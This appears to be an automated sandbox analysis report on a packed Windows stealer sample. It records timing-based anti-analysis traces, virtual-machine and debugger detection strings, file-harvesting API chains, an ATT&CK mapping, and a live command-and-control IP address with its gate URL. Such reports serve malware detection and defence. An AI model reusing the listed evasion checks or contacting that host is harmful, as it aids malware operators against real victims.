                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC11A second address: 6EC127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jne 00007F91A0D1A3D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC127 second address: 6EC12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC2C0 second address: 6EC2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jng 00007F91A0D1A3D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC2D1 second address: 6EC2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F91A12E5308h 0x00000010 jns 00007F91A12E52F6h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC2FA second address: 6EC30A instructions: 0x00000000 rdtsc 0x00000002 js 00007F91A0D1A3D6h 0x00000008 jne 00007F91A0D1A3D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F07DD second address: 6F0812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F91A12E5302h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F91A12E5309h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6118E6 second address: 6118EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6118EA second address: 6118F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6118F0 second address: 611909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F91A0D1A3DFh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70094B second address: 700950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBA23 second address: 6FBA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CF4D second address: 70CF51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CF51 second address: 70CF55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D761 second address: 71D76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F91A12E52F6h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D76C second address: 71D771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D771 second address: 71D777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D777 second address: 71D798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3DCh 0x00000009 popad 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007F91A0D1A3FAh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D798 second address: 71D79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C786 second address: 71C78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C78B second address: 71C790 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C790 second address: 71C796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C8EB second address: 71C8EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71C8EF second address: 71C913 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0D1A3E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F91A0D1A3D8h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D031 second address: 71D046 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F91A12E52FEh 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D437 second address: 71D451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91A0D1A3E2h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71D451 second address: 71D46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F91A12E5304h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72032B second address: 720340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F91A0D1A3D6h 0x0000000a jnp 00007F91A0D1A3D6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720340 second address: 720369 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5306h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F91A12E52FCh 0x0000000f je 00007F91A12E52F6h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720369 second address: 720371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722CD7 second address: 722CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7231A4 second address: 7231A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7231A8 second address: 7231F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007F91A12E5307h 0x0000000d nop 0x0000000e cld 0x0000000f push dword ptr [ebp+122D300Bh] 0x00000015 sub edx, dword ptr [ebp+122D3474h] 0x0000001b call 00007F91A12E52F9h 0x00000020 jmp 00007F91A12E52FDh 0x00000025 push eax 0x00000026 je 00007F91A12E5300h 0x0000002c pushad 0x0000002d push edi 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7231F7 second address: 723217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007F91A0D1A3DCh 0x0000000e mov eax, dword ptr [eax] 0x00000010 push esi 0x00000011 jbe 00007F91A0D1A3DCh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724A18 second address: 724A3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F91A12E5305h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F91A12E52F6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724A3D second address: 724A49 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F91A0D1A3D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 724A49 second address: 724A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7245F4 second address: 7245F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7245F8 second address: 7245FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7245FE second address: 724612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F91A0D1A3DEh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7266AE second address: 7266E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jnp 00007F91A12E52F6h 0x00000011 pop esi 0x00000012 pushad 0x00000013 jne 00007F91A12E52F6h 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F91A12E5305h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70302 second address: 4F7037C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F91A0D1A3E7h 0x00000009 sbb al, FFFFFFAEh 0x0000000c jmp 00007F91A0D1A3E9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F91A0D1A3E0h 0x00000018 jmp 00007F91A0D1A3E5h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 xchg eax, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ax, dx 0x00000028 call 00007F91A0D1A3DFh 0x0000002d pop ecx 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F70406 second address: 4F7047F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A12E5309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F91A12E5301h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007F91A12E5303h 0x00000018 pop eax 0x00000019 pushfd 0x0000001a jmp 00007F91A12E5309h 0x0000001f xor ax, E436h 0x00000024 jmp 00007F91A12E5301h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BDC0 second address: 64BDC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64BF80 second address: 64BF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 666589 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 491786 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 647DFB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6C79C6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_002438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00244910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00244910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0023DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0023E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0023ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00244570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00244570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0023DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0023BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00243EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00243EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0023F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_002316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00231160 GetSystemInfo,ExitProcess,0_2_00231160
                Source: file.exe, file.exe, 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2171047770.00000000010A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: file.exe, 00000000.00000002.2171047770.00000000010A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2171047770.0000000001043000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2171047770.0000000001078000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13637
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13659
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13640
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13691
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13651
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002345C0 VirtualProtect ?,00000004,00000100,000000000_2_002345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00249860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00249860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00249750 mov eax, dword ptr fs:[00000030h]0_2_00249750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00247850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00247850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1656, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00249600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00249600
                Source: file.exeBinary or memory string: :Program Manager
                Source: file.exe, 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: :Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00247B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00246920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00246920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00247850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00247850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00247A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00247A30

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.230000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2171047770.0000000001043000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2129309705.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1656, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 0.2.file.exe.230000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2171047770.0000000001043000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2129309705.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1656, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                http://185.215.113.37/ | 100% | URL Reputation | malware |
                http://185.215.113.37 | 100% | URL Reputation | malware |
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.phpzcu | file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | file.exe, 00000000.00000002.2171047770.000000000102E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2171047770.0000000001072000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.phpvca | file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37GD7 | file.exe, 00000000.00000002.2171047770.000000000102E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/am | file.exe, 00000000.00000002.2171047770.0000000001078000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpEy | file.exe, 00000000.00000002.2171047770.000000000108A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.phpj | file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/:y | file.exe, 00000000.00000002.2171047770.000000000108A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php&c | file.exe, 00000000.00000002.2171047770.000000000109A000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1523401
                                Start date and time:2024-10-01 15:21:06 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 33s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
